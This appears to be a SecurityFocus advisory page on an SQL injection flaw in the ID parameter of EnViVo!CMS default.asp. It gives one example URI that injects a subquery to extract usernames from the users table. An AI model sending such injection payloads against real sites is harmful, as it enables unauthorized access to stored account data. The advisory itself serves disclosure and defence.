info
discussion
exploit
solution
references
EnViVo!CMS Default.ASP ID Parameter SQL Injection Vulnerability
No exploit is required.
An example URI has been provided:
http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)--
Privacy Statement
Copyright 2010, SecurityFocus
